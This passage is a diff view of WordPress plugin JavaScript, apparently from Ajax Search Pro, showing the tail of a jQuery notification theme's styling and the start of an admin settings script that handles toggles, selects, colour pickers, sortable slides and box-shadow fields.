fontSize: '13px',
|
49 |
+
lineHeight: '16px',
|
50 |
+
textAlign: 'center',
|
51 |
+
padding: '8px 10px 9px',
|
52 |
+
width: 'auto',
|
53 |
+
position: 'relative'
|
54 |
+
});
|
55 |
+
|
56 |
+
this.$closeButton.css({
|
57 |
+
position: 'absolute',
|
58 |
+
top: 4, right: 4,
|
59 |
+
width: 10, height: 10,
|
60 |
+
background: "url(data:image/png;base64,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)",
|
61 |
+
display: 'none',
|
62 |
+
cursor: 'pointer'
|
63 |
+
});
|
64 |
+
|
65 |
+
this.$buttons.css({
|
66 |
+
padding: 5,
|
67 |
+
textAlign: 'right',
|
68 |
+
borderTop: '1px solid #ccc',
|
69 |
+
backgroundColor: '#fff'
|
70 |
+
});
|
71 |
+
|
72 |
+
this.$buttons.find('button').css({
|
73 |
+
marginLeft: 5
|
74 |
+
});
|
75 |
+
|
76 |
+
this.$buttons.find('button:first').css({
|
77 |
+
marginLeft: 0
|
78 |
+
});
|
79 |
+
|
80 |
+
this.$bar.bind({
|
81 |
+
mouseenter: function() { $(this).find('.noty_close').fadeIn(); },
|
82 |
+
mouseleave: function() { $(this).find('.noty_close').fadeOut(); }
|
83 |
+
});
|
84 |
+
|
85 |
+
switch (this.options.layout.name) {
|
86 |
+
case 'top':
|
87 |
+
this.$bar.css({
|
88 |
+
borderRadius: '0px 0px 5px 5px',
|
89 |
+
borderBottom: '2px solid #eee',
|
90 |
+
borderLeft: '2px solid #eee',
|
91 |
+
borderRight: '2px solid #eee',
|
92 |
+
boxShadow: "0 2px 4px rgba(0, 0, 0, 0.1)"
|
93 |
+
});
|
94 |
+
break;
|
95 |
+
case 'topCenter': case 'center': case 'bottomCenter': case 'inline':
|
96 |
+
this.$bar.css({
|
97 |
+
borderRadius: '5px',
|
98 |
+
border: '1px solid #eee',
|
99 |
+
boxShadow: "0 2px 4px rgba(0, 0, 0, 0.1)"
|
100 |
+
});
|
101 |
+
this.$message.css({fontSize: '13px', textAlign: 'center'});
|
102 |
+
break;
|
103 |
+
case 'topLeft': case 'topRight':
|
104 |
+
case 'bottomLeft': case 'bottomRight':
|
105 |
+
case 'centerLeft': case 'centerRight':
|
106 |
+
this.$bar.css({
|
107 |
+
borderRadius: '5px',
|
108 |
+
border: '1px solid #eee',
|
109 |
+
boxShadow: "0 2px 4px rgba(0, 0, 0, 0.1)"
|
110 |
+
});
|
111 |
+
this.$message.css({fontSize: '13px', textAlign: 'left'});
|
112 |
+
break;
|
113 |
+
case 'bottom':
|
114 |
+
this.$bar.css({
|
115 |
+
borderRadius: '5px 5px 0px 0px',
|
116 |
+
borderTop: '2px solid #eee',
|
117 |
+
borderLeft: '2px solid #eee',
|
118 |
+
borderRight: '2px solid #eee',
|
119 |
+
boxShadow: "0 -2px 4px rgba(0, 0, 0, 0.1)"
|
120 |
+
});
|
121 |
+
break;
|
122 |
+
default:
|
123 |
+
this.$bar.css({
|
124 |
+
border: '2px solid #eee',
|
125 |
+
boxShadow: "0 2px 4px rgba(0, 0, 0, 0.1)"
|
126 |
+
});
|
127 |
+
break;
|
128 |
+
}
|
129 |
+
|
130 |
+
switch (this.options.type) {
|
131 |
+
case 'alert': case 'notification':
|
132 |
+
this.$bar.css({backgroundColor: '#FFF', borderColor: '#CCC', color: '#444'}); break;
|
133 |
+
case 'warning':
|
134 |
+
this.$bar.css({backgroundColor: '#FFEAA8', borderColor: '#FFC237', color: '#826200'});
|
135 |
+
this.$buttons.css({borderTop: '1px solid #FFC237'}); break;
|
136 |
+
case 'error':
|
137 |
+
this.$bar.css({backgroundColor: 'red', borderColor: 'darkred', color: '#FFF'});
|
138 |
+
this.$message.css({fontWeight: 'bold'});
|
139 |
+
this.$buttons.css({borderTop: '1px solid darkred'}); break;
|
140 |
+
case 'information':
|
141 |
+
this.$bar.css({backgroundColor: '#57B7E2', borderColor: '#0B90C4', color: '#FFF'});
|
142 |
+
this.$buttons.css({borderTop: '1px solid #0B90C4'}); break;
|
143 |
+
case 'success':
|
144 |
+
this.$bar.css({backgroundColor: 'lightgreen', borderColor: '#50C24E', color: 'darkgreen'});
|
145 |
+
this.$buttons.css({borderTop: '1px solid #50C24E'});break;
|
146 |
+
default:
|
147 |
+
this.$bar.css({backgroundColor: '#FFF', borderColor: '#CCC', color: '#444'}); break;
|
148 |
+
}
|
149 |
+
},
|
150 |
+
callback: {
|
151 |
+
onShow: function() { $.noty.themes.defaultTheme.helpers.borderFix.apply(this); },
|
152 |
+
onClose: function() { $.noty.themes.defaultTheme.helpers.borderFix.apply(this); }
|
153 |
+
}
|
154 |
+
};
|
155 |
+
|
156 |
+
})(jQuery);
|
settings/types/others.js
ADDED
@@ -0,0 +1,525 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
(function( $ ){
|
2 |
+
function wpdreamsOthers (args) {
|
3 |
+
var _self = this;
|
4 |
+
this.constructor = function() {
|
5 |
+
_self.init = true;
|
6 |
+
$('.wpdreamscolorpicker').prev('input').bind("change", this.colorPickerInit);
|
7 |
+
$('.wpdreamscolorpicker').prev('input').trigger("change");
|
8 |
+
$('.wpdreams-slider.moveable .settings').trigger("click");
|
9 |
+
$("#wpdreams img[title].infoimage").tooltip({
|
10 |
+
effect: 'slide',
|
11 |
+
delay: 500,
|
12 |
+
events: {
|
13 |
+
def: 'click, mouseout',
|
14 |
+
img: 'click, blur',
|
15 |
+
checkbox: 'mouseover click, mouseout',
|
16 |
+
date: 'click, blur'
|
17 |
+
}
|
18 |
+
});
|
19 |
+
$( ".sortable" ).sortable({
|
20 |
+
items: 'div.wpdreams-slider.moveable',
|
21 |
+
dropOnEmpty: false,
|
22 |
+
delay: 200,
|
23 |
+
stop: function(event, ui) {
|
24 |
+
var nodes = $(".sortable div.wpdreams-slider.moveable");
|
25 |
+
var nodesArr = Array();
|
26 |
+
for(var j=0,i=nodes.length;i>=0;j++,i--) {
|
27 |
+
nodesArr[j] = $(nodes[i]).attr("slideid");
|
28 |
+
}
|
29 |
+
var data = {
|
30 |
+
action: 'reorder_slides',
|
31 |
+
nodes: nodesArr,
|
32 |
+
ordering: i
|
33 |
+
};
|
34 |
+
$(nodes).fadeTo(400, 0.4);
|
35 |
+
jQuery.post(ajaxurl, data, function(response) {
|
36 |
+
$(nodes).fadeTo(400, 1);
|
37 |
+
});
|
38 |
+
}
|
39 |
+
});
|
40 |
+
_self.init = false;
|
41 |
+
},
|
42 |
+
|
43 |
+
|
44 |
+
$('.wpdreamsThemeChooser select').bind('change', function(){
|
45 |
+
var parent = $(this);
|
46 |
+
while(parent.is('form')!=true) {
|
47 |
+
parent = parent.parent();
|
48 |
+
}
|
49 |
+
var themeDiv = $('div[name="'+$(this).val()+'"]');
|
50 |
+
var items = $('p', themeDiv);
|
51 |
+
items.each(function(){
|
52 |
+
param = $('input[name^="'+$(this).attr('paramname')+'_"]', parent);
|
53 |
+
param.val($(this).html());
|
54 |
+
$('.triggerer', param.parent()).trigger('click');
|
55 |
+
});
|
56 |
+
|
57 |
+
});
|
58 |
+
|
59 |
+
/*
|
60 |
+
Image Settings
|
61 |
+
Msg: The name of the separate params determinates the value outputted in the hidden field.
|
62 |
+
*/
|
63 |
+
$('.wpdreamsImageSettings input, .wpdreamsImageSettings select').change(function() {
|
64 |
+
parent = $(this).parent();
|
65 |
+
while (parent.hasClass('item')!=true) {
|
66 |
+
parent = parent.parent();
|
67 |
+
}
|
68 |
+
var elements = $('input[param!=1], select', parent);
|
69 |
+
var hidden = $('input[param=1]' ,parent);
|
70 |
+
var ret = "";
|
71 |
+
elements.each(function() {
|
72 |
+
ret+=$(this).attr("name")+":"+ $(this).val() + ";";
|
73 |
+
});
|
74 |
+
hidden.val(ret);
|
75 |
+
});
|
76 |
+
$('.wpdreamsImageSettings>fieldset>.triggerer').bind("click", function(){
|
77 |
+
var elements = $('input[param!=1], select', parent);
|
78 |
+
var hidden = $('input[param=1]' ,parent);
|
79 |
+
elements.each(function() {
|
80 |
+
var name = $(this).attr("name");
|
81 |
+
var regex = new RegExp(".*" + name + ":(.*?);.*");
|
82 |
+
val = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(regex);
|
83 |
+
$(this).val(val[1]);
|
84 |
+
if ($(this).next().hasClass('triggerer')) $(this).next().click();
|
85 |
+
});
|
86 |
+
});
|
87 |
+
//Image Settings End
|
88 |
+
|
89 |
+
/*
|
90 |
+
Select
|
91 |
+
Msg:
|
92 |
+
*/
|
93 |
+
$('.wpdreamsSelect .wpdreamsselect').change(function() {
|
94 |
+
_self.hidden = $(this).next();
|
95 |
+
var val = $(_self.hidden).val().match(/(.*[\S\s]*?)\|\|(.*)/);
|
96 |
+
var options = val[1];
|
97 |
+
var selected = val[2];
|
98 |
+
$(_self.hidden).val(options+"||"+$(this).val());
|
99 |
+
});
|
100 |
+
|
101 |
+
$('.wpdreamsSelect .triggerer').bind('click', function(){
|
102 |
+
var parent = $(this).parent();
|
103 |
+
var select = $('select', parent);
|
104 |
+
var hidden = $('input[type=hidden]', parent);
|
105 |
+
var val = $(hidden).val().replace(/(\r\n|\n|\r)/gm,"").match(/(.*[\S\s]*?)\|\|(.*)/);
|
106 |
+
var selected = $.trim(val[2]);
|
107 |
+
select.val(selected);
|
108 |
+
});
|
109 |
+
//Select end
|
110 |
+
|
111 |
+
|
112 |
+
/*
|
113 |
+
LanguageSelect
|
114 |
+
Msg:
|
115 |
+
*/
|
116 |
+
$('.wpdreamsLanguageSelect .wpdreamsselect').change(function() {
|
117 |
+
_self.hidden = $(this).next();
|
118 |
+
$(_self.hidden).val($(this).val());
|
119 |
+
});
|
120 |
+
|
121 |
+
//LanguageSelect end
|
122 |
+
|
123 |
+
|
124 |
+
/*
|
125 |
+
Onoff
|
126 |
+
Msg:
|
127 |
+
*/
|
128 |
+
$('.wpdreamsOnOff .wpdreamsonoff').click(function() {
|
129 |
+
var hidden = $(this).next();
|
130 |
+
var val = $(hidden).val();
|
131 |
+
if (val==1) {
|
132 |
+
val = 0;
|
133 |
+
$(this).removeClass("on");
|
134 |
+
$(this).addClass("off");
|
135 |
+
$(this).html("OFF");
|
136 |
+
} else {
|
137 |
+
val = 1;
|
138 |
+
$(this).removeClass("off");
|
139 |
+
$(this).addClass("on");
|
140 |
+
$(this).html("ON");
|
141 |
+
}
|
142 |
+
$(hidden).val(val).change();
|
143 |
+
});
|
144 |
+
$('.wpdreamsOnOff .triggerer').click(function() {
|
145 |
+
var hidden = $('input[type=hidden]', $(this).parent());
|
146 |
+
var a = $('a', $(this).parent());
|
147 |
+
var val = $(hidden).val();
|
148 |
+
if (val==0) {
|
149 |
+
a.removeClass("on").addClass("off").html("OFF");
|
150 |
+
} else {
|
151 |
+
a.removeClass("off").addClass("on").html("ON");
|
152 |
+
}
|
153 |
+
});
|
154 |
+
/*Onoff End*/
|
155 |
+
|
156 |
+
/*
|
157 |
+
YesNo
|
158 |
+
Msg:
|
159 |
+
*/
|
160 |
+
$('.wpdreamsYesNo .wpdreamsyesno').click(function() {
|
161 |
+
var hidden = $(this).next();
|
162 |
+
var val = $(hidden).val();
|
163 |
+
if (val==1) {
|
164 |
+
val = 0;
|
165 |
+
$(this).removeClass("yes");
|
166 |
+
$(this).addClass("no");
|
167 |
+
$(this).html("NO");
|
168 |
+
} else {
|
169 |
+
val = 1;
|
170 |
+
$(this).removeClass("no");
|
171 |
+
$(this).addClass("yes");
|
172 |
+
$(this).html("YES");
|
173 |
+
}
|
174 |
+
$(hidden).val(val);
|
175 |
+
$(hidden).change();
|
176 |
+
});
|
177 |
+
$('.wpdreamsYesNo .triggerer').click(function() {
|
178 |
+
var hidden = $('input[type=hidden]', $(this).parent());
|
179 |
+
var a = $('a', $(this).parent());
|
180 |
+
var val = $(hidden).val();
|
181 |
+
if (val==0) {
|
182 |
+
a.removeClass("yes").addClass("no").html("NO");
|
183 |
+
} else {
|
184 |
+
a.removeClass("no").addClass("yes").html("YES");
|
185 |
+
}
|
186 |
+
});
|
187 |
+
/*YesNo End*/
|
188 |
+
|
189 |
+
|
190 |
+
this.colorPickerInit = function(event) {
|
191 |
+
colorPicker = $(this).next().next('div');
|
192 |
+
input = this;
|
193 |
+
$(colorPicker).farbtastic(input);
|
194 |
+
};
|
195 |
+
$('.wpdreams-slider.moveable .settings').click(function(){
|
196 |
+
var moveable = this.parentNode.parentNode;
|
197 |
+
if ($('.errorMsg', moveable).length) return;
|
198 |
+
if (_self.sliderHeight==null) {
|
199 |
+
_self.sliderHeight = $(moveable).height();
|
200 |
+
}
|
201 |
+
if ($(moveable).height()<27) {
|
202 |
+
if (_self.init) {
|
203 |
+
$(moveable).css({
|
204 |
+
height: _self.sliderHeight
|
205 |
+
});
|
206 |
+
} else {
|
207 |
+
$(moveable).animate({
|
208 |
+
height: _self.sliderHeight
|
209 |
+
}, 500, function() {
|
210 |
+
});
|
211 |
+
}
|
212 |
+
} else {
|
213 |
+
if (_self.init) {
|
214 |
+
$(moveable).css({
|
215 |
+
height: "26px"
|
216 |
+
});
|
217 |
+
} else {
|
218 |
+
$(moveable).animate({
|
219 |
+
height: "26px"
|
220 |
+
}, 500, function() {
|
221 |
+
});
|
222 |
+
}
|
223 |
+
}
|
224 |
+
});
|
225 |
+
$('.successMsg').each(function() {
|
226 |
+
$(this).delay(4000).fadeOut();
|
227 |
+
});
|
228 |
+
$('img.delete').click(function() {
|
229 |
+
var del = confirm("Do yo really want to delete this item?");
|
230 |
+
if (del) {
|
231 |
+
$(this).next().submit();
|
232 |
+
}
|
233 |
+
});
|
234 |
+
|
235 |
+
/*
|
236 |
+
RadioImage
|
237 |
+
Msg:
|
238 |
+
*/
|
239 |
+
$('img.radioimage').click(function() {
|
240 |
+
$("img.radioimage", $(this).parent()).removeClass("selected");
|
241 |
+
$(this).addClass("selected");
|
242 |
+
var val = $("input[type=hidden]", $(this).parent()).val().match(/(.*[\S\s]*?)\|\|(.*)/);
|
243 |
+
var options = val[1];
|
244 |
+
var selected = val[2];
|
245 |
+
var pre = "/ajax-search-pro/img/" //magnifiers/magn5.png
|
246 |
+
var nval = $(this).attr('src').match(/.*?ajax-search-pro\/img\/(.*)/)[1];
|
247 |
+
nval = pre+nval;
|
248 |
+
$("input[type=hidden]", $(this).parent()).val(options+"||"+nval);
|
249 |
+
});
|
250 |
+
$('.wpdreamsImageRadio .triggerer').bind('click', function(){
|
251 |
+
var val = $("input[type=hidden]", $(this).parent()).val().replace(/(\r\n|\n|\r)/gm,"").match(/(.*[\S\s]*?)\|\|(.*)/);
|
252 |
+
var selected = $.trim(val[2]);
|
253 |
+
$("img", $(this).parent()).each(function(){
|
254 |
+
$(this).removeClass("selected");
|
255 |
+
var re = new RegExp(selected);
|
256 |
+
if ($.trim($(this).attr('src')).match(re)!=null) {
|
257 |
+
$(this).addClass("selected");
|
258 |
+
}
|
259 |
+
});
|
260 |
+
});
|
261 |
+
/*RadioImage End*/
|
262 |
+
|
263 |
+
|
264 |
+
/*
|
265 |
+
BoxShadow
|
266 |
+
Msg: Its a bit more complicated but working fine :)
|
267 |
+
*/
|
268 |
+
$('.wpdreamsBoxShadow input[type=text], .wpdreamsBoxShadow select').change(function() {
|
269 |
+
var value = "";
|
270 |
+
var parent = $(this).parent();
|
271 |
+
while (parent.hasClass('wpdreamsBoxShadow')!=true) {
|
272 |
+
parent = $(parent).parent();
|
273 |
+
}
|
274 |
+
var hlength = $.trim($('input[name*="_xx_hlength_xx_"]', parent).val())+"px ";
|
275 |
+
var vlength = $.trim($('input[name*="_xx_vlength_xx_"]', parent).val())+"px ";
|
276 |
+
var blurradius = $.trim($('input[name*="_xx_blurradius_xx_"]', parent).val())+"px ";
|
277 |
+
var spread = $.trim($('input[name*="_xx_spread_xx_"]', parent).val())+"px ";
|
278 |
+
var color = $.trim($('input[name*="_xx_color_xx_"]', parent).val())+" ";
|
279 |
+
var inset = $.trim($('select[name*="_xx_inset_xx_"]', parent).val())+";";
|
280 |
+
var boxshadow = "box-shadow:"+hlength+vlength+blurradius+spread+color+inset;
|
281 |
+
|
282 |
+
$('input[type=hidden]', parent).val(boxshadow);
|
283 |
+
});
|
284 |
+
$('.wpdreamsBoxShadow>fieldset>.triggerer').bind('click', function(){
|
285 |
+
var parent = $(this).parent();
|
286 |
+
var hidden = $("input[type=hidden]", parent);
|
287 |
+
var boxshadow = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(/box-shadow:(.*?)px (.*?)px (.*?)px (.*?)px (.*?) (.*?);/);
|
288 |
+
|
289 |
+
$('input[name*="_xx_hlength_xx_"]', parent).val(boxshadow[1])+"px ";
|
290 |
+
$('input[name*="_xx_vlength_xx_"]', parent).val(boxshadow[2])+"px ";
|
291 |
+
$('input[name*="_xx_blurradius_xx_"]', parent).val(boxshadow[3])+"px ";
|
292 |
+
$('input[name*="_xx_spread_xx_"]', parent).val(boxshadow[4])+"px ";
|
293 |
+
$('input[name*="_xx_color_xx_"]', parent).val(boxshadow[5])+" ";
|
294 |
+
$('select[name*="_xx_inset_xx_"]', parent).val(boxshadow[6])+";";
|
295 |
+
$('input[name*="_xx_color_xx_"]', parent).keyup();
|
296 |
+
/*var name = $(this).attr('name').match(/.*_xx_(.*)_xx_/)[1]
|
297 |
+
var regex = new RegExp(".*" + name + ":(.*?);.*");
|
298 |
+
val = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(regex);
|
299 |
+
$(this).val(val[1]); */
|
300 |
+
//$('input[name*="_xx_color_xx_"]', parent).trigger("keyup");
|
301 |
+
|
302 |
+
});
|
303 |
+
/*BoxShadow end*/
|
304 |
+
|
305 |
+
|
306 |
+
/*
|
307 |
+
Border
|
308 |
+
Msg: Its a bit more complicated but working fine :)
|
309 |
+
*/
|
310 |
+
$('.wpdreamsBorder input[type=text], .wpdreamsBorder select').bind("change", function() {
|
311 |
+
var value = "";
|
312 |
+
